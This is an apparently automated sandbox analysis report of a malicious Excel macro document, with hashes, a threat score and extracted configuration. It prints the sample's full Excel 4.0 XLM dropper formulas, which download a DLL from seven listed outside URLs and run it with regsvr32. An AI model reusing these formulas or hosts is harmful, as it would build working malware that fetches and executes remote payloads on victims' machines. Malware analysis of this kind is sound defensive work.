Overview

overview

10

Static

static

10

7e719ee6bc...d.xlsm

windows7-x64

10

7e719ee6bc...d.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    7e719ee6bcf016f525c302a96135f649eed29a4f01428793ea82097f6dd622cd

  • Size

    32KB

  • Sample

    241120-t7gkeayhkg

  • MD5

    a1409d09dd35fb9a308ae78cb1bd5f7c

  • SHA1

    c5b2ff0b27494854dbd5ab84f9c5d712e886a1b1

  • SHA256

    7e719ee6bcf016f525c302a96135f649eed29a4f01428793ea82097f6dd622cd

  • SHA512

    7f14d74dd661a9c28ef58da9d546f0988aeaad3e5610ef2486d372f9c1eb5d26d29f2169a538124667b2482b315a119cd44be987c5178e95db6cb931b148214c

  • SSDEEP

    384:wjzZPFhNjqEBOA7iEibbwBLg0SCdiVXUKgUrNU/qWhZOdBNPJM+kqr9eCgh0k5lY:wjpFhNNlizXT28dFfPdkqstJmE6/

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://casache.com/web/n3jxwXXwa/

https://www.blessingsource.com/blessingsource.com/rFQ0Ip6lQXXK/

http://ccalaire.com/wp-admin/d1pGRa0X/

http://cdimprintpr.com/brochure2/A9NmYDndZ/

http://careerplan.host20.uk/images/Ls/

http://ausnz.net/2010wc/odSi5tQKkCIXEWl9/

https://azsiacenter.com/js/sOhmiosLJOgwaP6i5nln/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://casache.com/web/n3jxwXXwa/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.blessingsource.com/blessingsource.com/rFQ0Ip6lQXXK/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ccalaire.com/wp-admin/d1pGRa0X/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://cdimprintpr.com/brochure2/A9NmYDndZ/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://careerplan.host20.uk/images/Ls/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ausnz.net/2010wc/odSi5tQKkCIXEWl9/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://azsiacenter.com/js/sOhmiosLJOgwaP6i5nln/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://casache.com/web/n3jxwXXwa/
xlm40.dropper

https://www.blessingsource.com/blessingsource.com/rFQ0Ip6lQXXK/
xlm40.dropper

http://ccalaire.com/wp-admin/d1pGRa0X/
xlm40.dropper

http://cdimprintpr.com/brochure2/A9NmYDndZ/
xlm40.dropper

http://careerplan.host20.uk/images/Ls/
xlm40.dropper

http://ausnz.net/2010wc/odSi5tQKkCIXEWl9/

Targets

    • Target

      7e719ee6bcf016f525c302a96135f649eed29a4f01428793ea82097f6dd622cd

    • Size

      32KB

    • MD5

      a1409d09dd35fb9a308ae78cb1bd5f7c

    • SHA1

      c5b2ff0b27494854dbd5ab84f9c5d712e886a1b1

    • SHA256

      7e719ee6bcf016f525c302a96135f649eed29a4f01428793ea82097f6dd622cd

    • SHA512

      7f14d74dd661a9c28ef58da9d546f0988aeaad3e5610ef2486d372f9c1eb5d26d29f2169a538124667b2482b315a119cd44be987c5178e95db6cb931b148214c

    • SSDEEP

      384:wjzZPFhNjqEBOA7iEibbwBLg0SCdiVXUKgUrNU/qWhZOdBNPJM+kqr9eCgh0k5lY:wjpFhNNlizXT28dFfPdkqstJmE6/

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks